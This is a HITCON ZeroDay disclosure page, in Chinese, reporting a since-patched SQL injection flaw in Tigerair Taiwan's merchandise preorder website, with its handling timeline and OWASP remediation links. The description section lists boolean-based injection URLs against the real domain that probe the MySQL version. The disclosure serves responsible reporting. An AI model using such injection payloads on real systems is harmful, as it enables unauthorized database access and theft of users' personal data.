台灣虎航商品預購網站注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00956
  •  發信 Vendor: 陶樂有限公司
  • Title: 台灣虎航商品預購網站注入漏洞
  • Introduction: SQL注入漏洞

處理狀態

目前狀態

公開
Last Update : 2018/09/15
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2018/07/09 04:50:29 : 新提交 (由 鄉民 修改)
  • 2018/07/09 04:52:59 : 新提交 (由 鄉民 修改)
  • 2018/07/10 00:09:23 : 審核完成 (由 HITCON ZeroDay 服務團隊 修改)
  • 2018/07/29 15:32:04 : 通報未回應 (由 HITCON ZeroDay 服務團隊 修改)
  • 2018/07/29 15:32:04 : 通報未回應 (由 HITCON ZeroDay 服務團隊 修改)
  • 2018/07/31 14:46:17 : 修補中 (由 HITCON ZeroDay 服務團隊 修改)
  • 2018/08/16 18:21:34 : 複測申請中 (由 企業 修改)
  • 2018/08/29 13:40:23 : 未修補完成 (由 鄉民 修改)
  • 2018/08/29 17:15:14 : 複測申請中 (由 企業 修改)
  • 2018/08/30 05:09:35 : 確認已修補 (由 鄉民 修改)
  • 2018/09/03 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2018/09/03 12:11:45 : 暫停 (由 HITCON ZeroDay 服務團隊 修改)
  • 2018/09/15 01:49:28 : 公開 (由 HITCON ZeroDay 服務團隊 修改)

詳細資料

  • ZDID:ZD-2018-00956
  • 通報者:鄉民
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.tigerairshop.com.tw/index.php?option=product&lang=cht&task=pageinfo&belongid=17&id={sqli}&index=2

敘述

  • 確認此點可用Boolean-based SQLi 手法撈出資料庫版本號可能為 5.5.55 版MySQL。測試語法與說明如下:

    http://www.tigerairshop.com.tw/index.php?option=product&lang=cht&task=pageinfo&belongid=17&id=185+and+substr(@@version,1,1)%3d5
    http://www.tigerairshop.com.tw/index.php?option=product&lang=cht&task=pageinfo&belongid=17&id=185+and+substr(@@version,3,1)>4
    http://www.tigerairshop.com.tw/index.php?option=product&lang=cht&task=pageinfo&belongid=17&id=185+and+substr(@@version,3,1)%3d5

    測試語法後半段若判斷式為真,回應頁面與 id =185 相同,如附件圖圖片
    測試語法後半段若判斷式為假,回應頁面與 id =185 相異,不存在商品圖片,如附件圖圖片

  • 提醒:
    真實世界中,攻擊者可利用此漏洞,撈取系統上機敏資料或進一步入侵。
    本人立意良善,以上測試語法旨在證明漏洞存在,僅點到為止,切勿因此測試語法輕視此漏洞存在。

修補建議

參考OWASP 國際組織提供的SQLI 修補方法
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

擷圖

留言討論

聯絡企業

 發送私人訊息
您也可以透過私人訊息的方式與企業聯繫,討論有關於這個漏洞的相關資訊。